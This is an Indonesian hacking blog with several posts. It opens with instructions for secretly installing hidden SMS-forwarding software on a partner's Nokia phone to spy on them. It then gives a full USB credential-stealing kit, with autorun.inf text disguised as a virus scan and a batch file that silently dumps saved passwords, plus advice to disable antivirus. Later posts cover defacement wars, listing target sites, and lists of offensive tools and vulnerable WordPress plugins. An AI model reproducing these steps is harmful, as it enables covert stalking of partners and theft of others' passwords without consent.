Minggu, 14 Juli 2013

Cara sadap SMS orang yang kita curigai


Ini adalah trik untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh

syarat:
# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis

hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis

Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :


1. Download smsanywherelite.sis untuk software menyadap.
2. Masukkan aplikasi symbian itu di HP anda dan target.

3. Begitu aplikasi ini diinstal, anda tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

4. Siapkan hp/ponsel target anda

5. Siapkan Hp/ponsel anda yang akan menerima sms masuk dari target anda.

6. Aktifkan aplikasi ini di ponsel target kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0

8. Sekarang, setiap target menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

CARA MENGHACK PC / LAPTOP DENGAN FLASHDISK

Tahukah anda fitur "keep me logged in", "Remember me on this computer" dan sebangsanya. Merupakan hal yang memudahkan kita agar tidak mengulang lagi dalam memasukkan username dan password, akan tetapi itu merupakan hal yang fatal. Karena kita dapat mencuri username dan password tersebut hanya dengan sebuah perangkat seperti Flashdisk.
Untuk itu saya sarankan agar anda hati-hati dalam menggunakan fitur-fitur tersebut, karena akan merugikan diri anda sendiri. Karena dengan tool-tool yang saya berikan, maka dengan mudah username dan password anda akan bisa di ambil atau di recovery.
Berikut tool beserta linknya :
MessenPass : piranti recover password yang paling populer untuk Program Instant Messenger seperti: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, dan Gaim.
Mail PassView : merecovery password dari program email seperti: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird dan Group Mail Gratis lainnya.
IE Passview : adalah utilitas sederhana yang bisa merecovery password dari browser Internet Explorer. Versi ini mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 – v6.0.
 
Protected Storage PassView : merecovery semua password yang tersimpan dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan masih banyak lagi …
PasswordFox : PasswordFox [TERUS TERANG ANE PALING SUKA SAMA YANG INI] adalah utilitas pemulihan password sederhana yang memungkinkan anda melihat nama pengguna dan sandi yang disimpan oleh browser Mozilla Firefox. Secara default, PasswordFox menampilkan password yang disimpan dalam profil aktif Anda, tetapi Anda dapat dengan mudah memilih untuk melihat password Firefox di lain profil.
Berikut adalah langkah demi langkah untuk menciptakan procedure password hacking toolkit dalam USB Drive (Flashdisk) :
CATATAN : Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah ini.
1. Download dan ekstrak ke 5 tools di atas dan copy file executable (Exe file) saja ke Flashdisk yaitu : Salinlah file – mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.
2. Buat file Notepad baru dan dan ketik teks berikut ini :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
3. Simpan Notepad and rename dari New Text Document.txt menjadi autorun.inf, lalu
copy file autorun.inf ke dalam USB drive.
4. Buat file Notepad baru lagi dan ketik teks berikut :
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
5. Simpan file Notepad and gantilah namanya dari New Text Document.txt menjadi launch.bat, lalu Salin file launch.bat ke dalam USB drive Anda.
Sekarang rootkit Anda sudah siap di gunakan untuk hack password. Namun, tools Hack ini akan bekerja pada Windows 2000, XP, Vista dan 7 serta akan memulihkan password jika ada password yang tersimpan dalam computer.
Cara menggunakan flashdisk hack tools sebagai berikut :
1. Masukkan flashdisk ke USB Port dan jendela pop-up autorun akan tampil. (Hal ini karena, ada telah menciptakan sebuah autorun di flashdisk).
2. PENTING : Pada jendela pop-up, pilih pilihan pertama ( melakukan scan Virus | Perform a Virus Scan).
3. Sekarang, semua hacking tools password berjalan secara diam-diam di belakang layar. Proses ini memakan waktu tidak terlalu lama. Password yang di temukan akan di recover untuk selanjutnya disimpan dalam sebuah file TXT.
4. Keluarkan flashdisk dan Anda akan melihat password yang tersimpan dalam format TXT file.

Sabtu, 13 Juli 2013

11 Bulan, China Ringkus 460 Hacker


BEIJING - Pemerintah menyatakan telah menangkap sekira 460 orang hacker sejak awal tahun hingga November 2010. Kementerian keamanan publik China mengaku khawatir dengan masa depan keamanan jaringan komputer yang dinilainya tetap suram.

"Saat ini kami akan tetap melakukan tindakan keras pada hacker meski jumlah serangan hacker dan kegiatan sabotase di China masih tinggi," kata seorang pejabat kementerian yang tidak disebutkan namanya seperti dilansir Reuters, Rabu (1/12/2010).

Pemerintah China berkepentingan untuk melaporkan penangkapan sejumlah hacker. Pasalnya China dituding Amerika Serikat (AS) sebagai negara yang berada di balik sejumlah aksi peretasan komputer di seluruh dunia. Bahkan dokumen WikiLeaks menyebutkan China memang berada di belakang aksi penyusupan ke jaringan komputer milik raksasa Internet Google.

Kementerian keamanan menyatakan hingga akhir November setidaknya pemerintah telah mengusut sekira 180 serangan yang dilakukan oleh hacker.

Awal Februari lalu China diketahui telah menutup sebuah situs yang mengklaim sebagai 'tempat' pelatihan Hacker terbesar di negara itu dan menangkap tiga pengelola situs tersebut.

China sendiri menolak keras bila dituding sebagai sarang hacker. Pemerintah tidak membenarkan aksi hacking yang tetap menjadi hobi populer di negeri tirai bambu itu. Banyak situs asal China yang menawarkan program murah untuk mempelajari dasar-dasar hacking.

HACKER SECTOR 404

Setelah saya dulu sempat update artikel tentang Pesan Hacker Anonymous Terhadap Indonesia saya kali ini akan menyinggung lagi tentang dunia underground.

Bedanya kali ini saya tidak menyinggung soal  Anonymous tetapi soal hacker yang bernama Sector 404.Hacker tersebut telah berhasil membobol website yang beralamat di http://duben.com.co/ .Dan sampai saya menulis artikel ini , Website tersebut masih down dan belum ada perbaikan dari Admin nya.
Saya mendapat kabar ini melalui jejaring sosial Twitter (maklumlah anak gaul wkwkwk).Dengan terang-terangan Sector 404 menulis pada TL nya sebagai berikut.
Klik Untuk Memperjelas
Dari cuplikan di atas , sudah jelaskan siapa itu Sector 404.Kalau menurut saya sih temen nya si Anonymous.Dan berikut merupakan Potret dari Website yang kena Deface tersebut.
Klik Untuk Memperjelas

PERTEMPURAN 7 HARI ANTARA HACKER INDONESIA VS HACKER MALAYSIA


Puluhan situs diklaim telah dideface oleh komunitas hacker asal Malaysia. Aksi ini bisa jadi akan memicu munculnya perang cyber antar kedua negara, Indonesia dan Malaysia.

Upaya deface pada situs-situs Indonesia ini telah berlangsung sejak lama. Tidak heran jika ada beberapa situs yang telah berhasil diperbaiki. Namun, dalam pantauan , banyak juga situs yang masih menunjukkan tampilan deface 'Hacked by Anti Indon' hingga saat ini dan belum melakukan perbaikan.

Inilah situs-situs tersebut.

http://waktuband.com
http://visitbalikpapan.com
http://urologi.or.id
Genderang perang antar hacker Indonesia dengan Malaysia rupanya telah ditabuh. Setelah, sebelumnya dua kelompok dari yadoyy666 (Indonesia) dan alien crew (Malaysia) berseteru. Kini, giliran Yogyacarderlink yang ambil bagian.

Aksi para hacker Yogyacardelink ini dilakukan dengan mengacak-acak situs milik Malaysia yang beralamat di http://welfordmedical.com/news_details.php. Situs milik perusahaan Welford, yang merupakan penyedia jasa alat-alat kesehatan untuk rumah sakit itu berhasil disusupi dengan meninggalkan jejak khas mereka berupa foto siluet.

selain foto siluet khas Yogyacarderlink, mereka juga menampilkan pesan yang berisi nada profokatif,

You want Cyberwarfare ?? I give you now

Selain menyambangi bagian dalam situs tersebut, hacker ini juga merusak tampilan depannya. Ini setelah kanal news dan event situs tersebut mereka infeksi dengan kata-kata yang berisi "v3n0m OwnZ Your System".

Seperti diketahui, dalam beberapa hari terakhir rupanya telah terjadi perseteruan antara hacker Indonesia dan Malaysia. Kedua hacker, yang masih-masing mengatasnamakan yadoyy666 (Indonesia) dan alien crew (Malaysia) saling unjuk kekuatan dengan melakukan aksi deface.

Tak pelak, beberapa situs Indonesia seperti Pemuda Hanura, Gerbang Linux, KBRI Beirut, dan FK Usakti 95, berhasil disambangi alien crew.

Setelah di gempur beberapa kali oleh Malaysia, Indonesia pun berbalik menyerang situs-situs Malaysia
Serangan oleh beberapa hacker asal Indonesia terhadap beberapa situs Malaysia ternyata berhasil didokumentasikan di sebuah situs. Serangan ini terkait dengan Cyber War yang telah dilancarkan antar kedua negara yaitu Indonesia dan Malaysia dalam beberapa waktu belakangan.

Nampak di situs tersebut, puluhan screen shoot situs Malaysia yang berhasil disusupi oleh kelompok hacker lokal, macam yadoy66, Tr1993r_m4ch1n3, ninj4_blu3, dan masih banyak lagi yang lainnya. Meskipun saat ditelusuri ,Selasa (25/11/2008), ke semua situs tersebut telah berhasil dibetulkan.

Beberapa situs Malaysia yang berhasil disusupi di antaranya, adalah, http://5a.com.my/, http://imm.com.my/, http://eznet.com.my/, http://yccreative.com/, dan masih banyak lainnya.

Selain itu, pengelolanya pun telah menuliskan pesan di depan web mereka yang berisikan,

Hey Malingsial h4x0r
Jangan coba kau ganggu kami
Jangan kau coba merendahkan bangsa kami
Jangan sampai bendera perang berkibar kembali

And for you know
WE ARE READY FOR CYBERNATIC WAR

Aksi beberapa kelompok hacker ini merupakan bentuk balas dendam yang dilakukan oleh hacker asal negeri jiran yang bernama alien crew karena telah melakukan deface pada beberapa situs di Indonesia dengan tampilan 'Hacked by Anti Indon'.

Di tempat lain, kelompok yang menamakan dirinya Yogyacarderlink juga merusak situs perpustakaan milik Universiti Utara Malaysia dengan URL http://cmslib.uum.edu.my/psb/.

Akan tetapi, tidak seperti aksi sebelumnya, mereka hanya masuk lewat server yang 'berlubang', yang sudah pasti kehadiran mereka hanya dapat diketahui oleh orang tertentu, dan pihak admin saja.

Tidak lupa, foto siluet khas mereka terpampang jelas bersama bendera Indonesia dengan pesan yang berisi 'Salam Piss dan Love by: Indonesia Hacker". (srn)
Aksi saling retas antara hacker Indonesia dan Malaysia belum berhenti. berselang  hari Indonesia terus membombardir malaysia dengan melakukan serang-serangan  yang Tak ada ampun-na, kali ini empat halaman web Malaysia yang dibobol.

Tiga situs pertama adalah http://pancommonwealth2008.kkr.gov.my/,
http://www.malaysiaskills.kkr.gov.my/, dan http://aseanskills.kkr.gov.my/. Wajah ketiga situs itu berubah dengan tampilan gambar dua iblis yang membawa garputala dan tersenyum. Terpampang pula tulisan besar "Vires" juga "indo counter attack". Sementara sang peretas meninggalkan identitas dirinya sebagai "netheroes".

Halaman web penjual CCTV online yang beralamat di http://cctv2u.my/ juga turut jadi sasaran penyusupan. Halaman depan situs itu dikotori dengan tulisan "Got Hacked!? bL4Ck_3n91n3 was here!!!!". Sebuah bendera Merah Putih juga berkibar di antara produk-produk yang dijual.

Berdasar informasi yang diperoleh dari peretas.freeforums.org, Rabu (26/11/2008), peretas melakukan aksi ini sebagai balas dendam atas aksi hacking yang juga dilakukan hacker Negeri Para Datuk itu. Dalam thread di forum tersebut, tertulis pula petikan pidato mantan Presiden Sukarno tentang aksi ganyang Malaysia.

"Ini dadaku, untuk Indonesiaku," tulis pesan dalam thread itu.
Sebelumnya, puluhan situs Tanah Air diretas hacker Malaysia yang mengatasnamakan "Anti-Indon". Situs-situs itu antara lain http://waktuband.com, http://visitbalikpapan.com, http://urologi.or.id, http://pks-mesir.com, http://kontak-jodoh-islam.com, http://kbri-beirut.org, http://jayakarta.ac.id, dan http://link.or.id. (srn)
Setelah pertempuran sempat mereda, tanpa membuang waktu lagi perang di dunia maya antara dua negara ini kembali pecah. Sebuah kelompok yang mengatasnamakan Komunitas hacker Sekuritionline.net berhasil membobol beberapa situs milik Malaysia.
Komunitas hacker Sekuritionline.net menyatakan bahwa aksi mereka ini dilakukan karena negara serumpun itu masih sering membajak budaya Indonesia. Hal inilah yang membuat mereka merasa perlu untuk mengingatkan pemerintah Malaysia, dengan cara mengacak-acak situs-situs yang ada dalam wilayah Malaysia.

Dari pantauan, Senin (1/12/2008), beberapa situs yang berhasil dirusak adalah, www.arasmega.com.my, www.libertycup.com.my, www.fmp.com.my, bendahari.upsi.edu.my, www.lib.usm.edu, dan laiblue.net.

Hampir semua situs yang disambangi oleh komunitas ini meninggalkan pesan pada halaman situs mereka. Pesan yang diikuti gambar logo Komunitas hacker Sekuritionline.net, berisi :

HacKed By Ginto SeKurItioNLine

IndoNeSian HAcker COmmuNity

STop PencuriaN Budaya KAmi atau RasaKan akibatnya!!

MaLingSIal NEgara Bodoh YAng HAnya BISa MembaJak

Sampai saat ini, belum ada perbaikan dari pihak pengelola situs-situs tersebut. Kecuali hanya situs bendahari.upsi.edu.my, yang sudah bisa diakses secara normal. Bahkan saat alamat URL lain terbuka, tampilan yang ada masih terpampang jelas hasil 'kreasi' komunitas yang belum jelas identitasnya ini.

Bendahari.upsi.edu.my sendiri merupakan kepunyaan bendahara Universiti Pendidikan Sultan Idris (UPSI). Sedangkan beberapa situs seperti www.arasmega.com.my, adalah situs majalah anak-anak, lalu www.libertycup.com.my, situs kejuaran Liberty Cup, serta www.fmp.com.my, merupakan situs yang bergerak di bidang jasa layanan komputer. Okezone.com

hacking and cracking tool 2013

Berikut ini adalah tool tool hacking dan cracking 2013 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2013. lets hack all !


1. PWN STAR
Sebuah script bash untuk meluncurkan AP , dapat dikonfigurasi dengan berbagai macam pilihan serangan. Termasuk sejumlah script index.html dan server php, untuk phishing. Dapat bertindak sebagai multi-klien captive portal menggunakan php dan iptables. Eksploitasi klasik seperti kejahatan-PDF, De-auth dengan aireplay, dll.
PwnStar BinusHacker
Fitur Umum:
  1. Mengelola Antarmuka dan MAC Spoofing
  2. Mengatur sniffing
  3. Web phishing
  4. Karmetasploit
  5. WPA handshake
  6. De-auth klien
  7. Mengelola Iptables

2. ZED Attack Proxy (ZAP)

(ZAP) adalah alat penetrasi pengujian terpadu untuk menemukan kerentanan dalam aplikasi web. Tools ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman security dan dengan demikian sangat ideal untuk para pengembang dan penguji fungsional yang baru untuk penetration testing serta menjadi tambahan yang berguna untuk toolbox tester.
ZAP - Zen Attack Proxy 2013
Fitur Utama:
  1. Intercepting Proxy
  2. Active scanner
  3. Passive scanner
  4. Brute Force scanner
  5. Spider
  6. Fuzzer
  7. Port Scanner
  8. Dynamic SSL certificates
  9. API
  10. Beanshell integration

3. SET (Social Engineering Toolkit)

Tools yang berfokus pada menyerang unsur kelemahan dan kelengahan manusia. Tool ini sangat banyak digunakan saat ini dan merupakan salah satu tools yang sukses di demonstrasikan di Defcon.
SET - Social Engineering Toolkit BinusHacker
Fitur Utama:
  • Spear-Phishing Attack Vector
  • Java Applet Attack Vector
  • Metasploit Browser Exploit Method
  • Credential Harvester Attack Method
  • Tabnabbing Attack Method
  • Man Left in the Middle Attack Method
  • Web Jacking Attack Method
  • Multi-Attack Web Vector
  • Infectious Media Generator
  • Teensy USB HID Attack Vector

4. BURP SUITE

Burp Suite adalah alat yang sangat bagus sekali untuk pengujian keamanan aplikasi web. Alat ini sangat bagus untuk pentester dan peneliti keamanan. Ini berisi berbagai alat dengan antarmuka banyak di antara mereka yang dirancang untuk memudahkan dan mempercepat proses menyerang aplikasi website.
Burp Suite - BinusHacker
Fungsi Umum:
  1. Intersepsi proxy
  2. Radar crawling dan spider
  3. Webapps scanner
  4. Alat penyerangan
  5. Repeater dan sequencer tools

5. ETTERCAP

Ettercap adalah sniffer multiguna / interceptor / logger untuk Local Area Network. Mendukung diseksi aktif dan pasif dari banyak protokol (bahkan yang dalam bentuk kode) dan mencakup banyak fitur untuk analisis jaringan dan host.
Ettercap - 
BinusHacker
Ettercap - BinusHacker
Fungsi Umum:
  1. Untuk melakukan capture traffic dan data
  2. Untuk melakukan logging network
  3. Dll

6. SANS Investigative Forensic Toolkit (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation adalah VMware Appliance yang bisa di konfigurasi dengan semua kebutuhan untuk melakukan digital forensik secara mendetail. Kompatible dengan Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. Versi baru telah sepenuhnya dibangun kembali pada basis Ubuntu dengan banyak tools tambahan dan kemampuan yang digunakan dalam teknologi modern forensik.SANS+Investigative+Forensic+Toolkit+2.14+Released
Fungsi Umum SIFT:
  1. iPhone, Blackberry, and Android Forensic Capabilities
  2. Registry Viewer (YARU)
  3. Compatibility with F-Response Tactical, Standard, and Enterprise
  4. PTK 2.0 (Special Release – Not Available for Download)
  5. Automated Timeline Generation via log2timeline
  6. Many Firefox Investigative Plugins
  7. Windows Journal Parser and Shellbags Parser (jp and sbag)
  8. Many Windows Analysis Utilities (prefetch, usbstor, event log, and more)
  9. Complete Overhaul of Regripper Plugins (added over 80 additional plugins)

7. WIRESHARK

Wireshark adalah alat yang paling banyak digunakan dan paling populer pada dunia analyzer protokol, dan merupakan standar de facto di banyak industri dan lembaga pendidikan untuk menganalisa jaringan di berbagai protokol.
Wire Shark - 2013 - BinusHacker
Fungsi Umum:
  1. Live capture and offline analysis
  2. Standard three-pane packet browser
  3. Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  4. Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
  5. The most powerful display filters in the industry
  6. Rich VoIP analysis
  7. Read/write many different capture file formats
  8. Dll

8. WEBSPLOIT

WebSploit adalah Open Source Project untuk Scan dan Analysis Remote System dari kelemahan-kelemahan pada aplikasi website.
WebSploit+Framework+2.0.3+with+Wifi+Jammer
Fitur Utama:
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
—-
[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

9. WINAUTOPWN

WinAutoPWN merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server :)
WinAutoPWN 2013 - BinusHacker

10. HASHCAT

Hashcat adalah sebuah tools untuk crack berbagai password yang di encrypt, sangat powerfull untuk recovery password.
Hashcat 2013 - 
BinusHacker
Fungsi Umum:
  1. Multi-Threaded
  2. Free
  3. Multi-Hash (up to 24 million hashes)
  4. Multi-OS (Linux, Windows and OSX native binaries)
  5. Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …)
  6. SSE2 accelerated
  7. All Attack-Modes except Brute-Force and Permutation can be extended by rules
  8. Very fast Rule-engine
  9. Rules compatible with JTR and PasswordsPro
  10. Possible to resume or limit session
  11. Automatically recognizes recovered hashes from outfile at startup
  12. Can automatically generate random rules
  13. Load saltlist from external file and then use them in a Brute-Force Attack variant
  14. Able to work in an distributed environment
  15. Specify multiple wordlists or multiple directories of wordlists
  16. Number of threads can be configured
  17. Threads run on lowest priority
  18. 30+ Algorithms implemented with performance in mind
  19. and much more

11. UNISCAN

Uniscan adalah scanner untuk aplikasi web, yang ditulis dalam perl untuk Linux. Saat ini versi Uniscan adalah 6,2.
uniscan
Fungsi Umum:
  1. Identification of system pages through a Web Crawler.
  2. Use of threads in the crawler.
  3. Control the maximum number of requests the crawler.
  4. Control of variation of system pages identified by Web Crawler.
  5. Control of file extensions that are ignored.
  6. Test of pages found via the GET method.
  7. Test the forms found via the POST method.
  8. Support for SSL requests (HTTPS).
  9. Proxy support.
  10. Generate site list using Google.
  11. Generate site list using Bing.
  12. Plug-in support for Crawler.
  13. Plug-in support for dynamic tests.
  14. Plug-in support for static tests.
  15. Plug-in support for stress tests.
  16. Multi-language support.
  17. Web client.

12. OLYYDBG

OllyDbg adalah 32-bit assembler debugger untuk Microsoft Windows. Penekanan pada analisis kode biner membuatnya sangat berguna dalam kasus-kasus di mana sourcecode tidak tersedia.
OllyDbg Cracking 2013 - BinusHacker
Fungsi Umum:
  1. Intuitive user interface, no cryptical commands
  2. Code analysis – traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
  3. Directly loads and debugs DLLs
  4. Object file scanning – locates routines from object files and libraries
  5. Allows for user-defined labels, comments and function descriptions
  6. Understands debugging information in Borland® format
  7. Saves patches between sessions, writes them back to executable file and updates fixups
  8. Open architecture – many third-party plugins are available
  9. No installation – no trash in registry or system directories
  10. Debugs multithread applications
  11. Attaches to running programs
  12. Configurable disassembler, supports both MASM and IDEAL formats
  13. MMX, 3DNow! and SSE data types and instructions, including Athlon extensions
  14. Full UNICODE support
  15. Dynamically recognizes ASCII and UNICODE strings – also in Delphi format!
  16. Recognizes complex code constructs, like call to jump to procedure
  17. Decodes calls to more than 1900 standard API and 400 C functions
  18. Gives context-sensitive help on API functions from external help file
  19. Sets conditional, logging, memory and hardware breakpoints
  20. Traces program execution, logs arguments of known functions
  21. Shows fixups
  22. Dynamically traces stack frames
  23. Searches for imprecise commands and masked binary sequences
  24. Searches whole allocated memory
  25. Finds references to constant or address range
  26. Examines and modifies memory, sets breakpoints and pauses program on-the-fly
  27. Assembles commands into the shortest binary form
  28. Starts from the floppy disk

13. BBQSQL

BBQSQL merupakan Opensource SQL injection tools dengan kerangka kerja khusus yang dirancang untuk menjalankan proses secara hyper cepat, agnostik database, mudah untuk setup, dan mudah untuk memodifikasi. Ini adalah satu lagi rilis mengagumkan dari Arsenal 2012 Blackhat USA. Ketika melakukan penilaian keamanan aplikasi, kita sering menemukan kerentanan SQL yang sulit untuk di exploitasi, dengan tools ini akan menjadi sangat mudah.
BBQSQL ditulis dengan bahasa pemrograman Python. Hal ini sangat berguna ketika menyerang kerentanan SQL injection rumit. BBQSQL juga merupakan alat semi-otomatis, yang memungkinkan sedikit kustomisasi bagi mereka yang sulit untuk memicu temuan injeksi SQL. Alat ini dibangun untuk menjadi agnostik database dan sangat serbaguna. Ia juga memiliki UI intuitif untuk membuat pengaturan serangan jauh lebih mudah.
BBQSQL SQL Injection Tools 2013 - BinusHacker
Fungsi Umum:
  1. SQL Injection Tools
  2. URL
  3. HTTP Method
  4. Headers
  5. Cookies
  6. Encoding methods
  7. Redirect behavior
  8. Files
  9. HTTP Auth
  10. Proxies

14. CRYPTOHAZE

Tools untuk crack password / hash dimana cryptohaze mendukung CUDA, OpenCL, dan CPU kode (SSE, AVX, dll). Bisa berjalan di OS yang support CUDA. Semua ini ditujukan untuk pentester agar lebih mudah dalam melakukan crack hash.
CryptoHaze 2013 - BinusHacker
Fungsi Umum:
  1. Crack berbagai macam hash
  2. Menampilkan hasil dari crackhash
  3. Cracking di berbagai platform OS

15. SAMURAI WEB TESTING FRAMEWORK (SWTF)

SWTF ini digunakan untuk melakukan pengujian / pentest terhadap web application, digunakan untuk menemukan kelemahan dan melakukan exploitasi terhadap web tersebut. Sangat komplit dan banyak digunakan didunia termasuk digunakan oleh salah satu staff binushacker :)
Samurai Web Pentest 2013 - BinusHacker
Fungsi Umum:
  1. Web Scanner
  2. Web Mapping
  3. Web Exploitation

Tools di atas wajib untuk dimiliki di 2013, selamat untuk mencoba dan bereksperimen 

CELAH KEAMANAN PLUGINS WORDPRESS

Berikut ini daftar wordpress exploit, wordpress vulnerabilities list, sql injection wordpress, wordpress vulnerabilities scanner, wordpress vulnerabilities 2012, wordpress security vulnerabilities, wordpress hacking, wordpress hacking 2012, wordpress hacking, wordpress hacked, wordpress hacking attacks.
Metode XSS
  • WordPress DX-Contribute Plugin 1.1.0 – XSS
  • Post-views plugin 2.6.1. – XSS
  • WP e-Commerce 1.1.1 – XSS
  • WordPress WooCommerce Predictive Search Plugin 1.0.6. – XSS
  • Video Lead Form 0.5 – XSS
  • Pretty Link Lite Plugin 1.6.0 – XSS
  • WP125 plugin 1.4.5. XSS
  • Ultimate TinyMCE plugin 3.6. – XSS
  • Wysija Newsletters Plugin 2.1.7. – XSS
  • WordPress Carousel Slideshow 3.10 – XSS
  • BuddyStream plugin 2.6.2 – XSS
  • NextGEN Gallery 1.9.7 – XSS
  • Amazon Associate plugin 2.0 – XSS
SQL Injection
  • Hitasoft FLV Player Plugin 1.1 SQL Injection
  • AJAX Post Search Plugin 1.1 – SQL Injection
Lainnya
  • Advanced Custom Fields Plugin 3.5.2. – Arbitrary file inclusion
  • vTiger CRM Lead Capture 1.1.0. – unspecified errors
  • WP-Filebase Plugin 0.2.9.24. – unspecified errors
Wordpress List Vulnerabilities
Berikut Daftar Lengkap WordPress Plugin Yang Memiliki Celah Keamanan 2012:
  • Welcart e-Commerce December 14, 2012
  • Knews Multilingual Newsletters December 14, 2012
  • Bulk update many plugins added December 7, 2012
  • All Video Gallery November 2, 2012
  • WordPress Spider Catalog November 2, 2012
  • Slideshow ( jquery image gallery) Plugin November 2, 2012
  • FoxyPress Plugin November 2, 2012
  • GRAND FlAGallery Plugin October 28, 2012
  • FireStorm Professional Real Estate October 28, 2012
  • WordPress Poll Plugin October 28, 2012
  • Thank You Counter October 28, 2012
  • UnGallery plugin October 28, 2012
  • Zingiri Bookings plugin October 28, 2012
  • WordPress Wordfence Plugin October 23, 2012
  • WordPress White Label CMS October 22, 2012
  • Download Shortcode Plugin October 22, 2012
  • Pinterest “Pin It” Button Lite October 6, 2012
  • Spider Calendar October 6, 2012
  • ABC Test September 27, 2012
  • Token Manager plugin September 27, 2012
  • Sexy Add Template September 27, 2012
  • Notices Ticker September 27, 2012
  • WP-TopBar September 21, 2012
  • MF Gig Calendar September 21, 2012
  • Answer-my-question September 21, 2012
  • Cloudsafe365 August 29, 2012
  • Image news slider August 29, 2012
  • Count Per Day plugin August 29, 2012
  • Zingiri Web Shop August 22, 2012
  • Mz-jajak August 15, 2012
  • Postie August 13, 2012
  • Vitamin Plugin August 9, 2012
  • G-Lock Double Opt-in August 3, 2012
  • GD Star Rating July 26, 2012
  • Mac Photo Gallery plugin July 26, 2012
  • Backup July 26, 2012
  • Flexi Quote Rotator July 26, 2012
  • Get Off Malicious Scripts July 26, 2012
  • LeagueManager plugin July 18, 2012
  • Resume Submissions & Job Postings July 18, 2012
  • Paid Memberships Pro July 16, 2012
  • Global Content Blocks July 16, 2012
  • The Guardian News Feed plugin July 11, 2012
  • WP Symposium July 11, 2012
  • Leaflet Maps Marker July 11, 2012
  • Artiss Code Embed July 11, 2012
  • Front-end Editor July 11, 2012
  • WP Socializer July 8, 2012
  • PHPFreeChat plugin July 8, 2012
  • Knews Multilingual Newsletters July 8, 2012
  • Contus Vblog plugin July 8, 2012
  • Custom tables plugin July 8, 2012
  • Church_admin Plugin July 7, 2012
  • MoodThingy plugin July 7, 2012
  • Quick Post Widget July 7, 2012
  • Email newsletter July 7, 2012
  • Quotes Collection Plugin July 4, 2012
  • Count Per Day plugin July 4, 2012
  • Zingiri Web Shop July 4, 2012
  • Job Manager June 29, 2012
  • N-Media Mailchimp June 24, 2012
  • TheCartPress plugin June 21, 2012
  • Zingiri Web Shop June 17, 2012
  • Kk Star Ratings June 17, 2012
  • Easy Contact Forms Export June 17, 2012
  • WpStoreCart June 17, 2012
  • MAC PHOTO GALLERY June 17, 2012
  • Top Quark Architecture June 17, 2012
  • Tinymce Thumbnail Gallery June 17, 2012
  • WP-Property June 9, 2012
  • Front End Upload June 9, 2012
  • FoxyPress June 9, 2012
  • WordPress VideoWhisper Video Presentation June 9, 2012
  • Omni Secure Files Plugin June 9, 2012
  • HTML5 AV Manager Plugin June 9, 2012
  • Google Maps Via Store Locator Plus June 9, 2012
  • WordPress Font Uploader June 9, 2012
  • MM Forms Community June 9, 2012
  • ALO EasyMail Newsletter May 31, 2012
  • WordPress WassUp Plugin May 21, 2012
  • WP Easy Gallery Plugin May 17, 2012
  • WP Easy Gallery Plugin May 17, 2012
  • GRAND Flash Album May 17, 2012
  • WordPress CataBlog Plugin May 17, 2012
  • WordPress Dynamic Widgets Plugin May 17, 2012
  • WordPress Network Publisher May 16, 2012
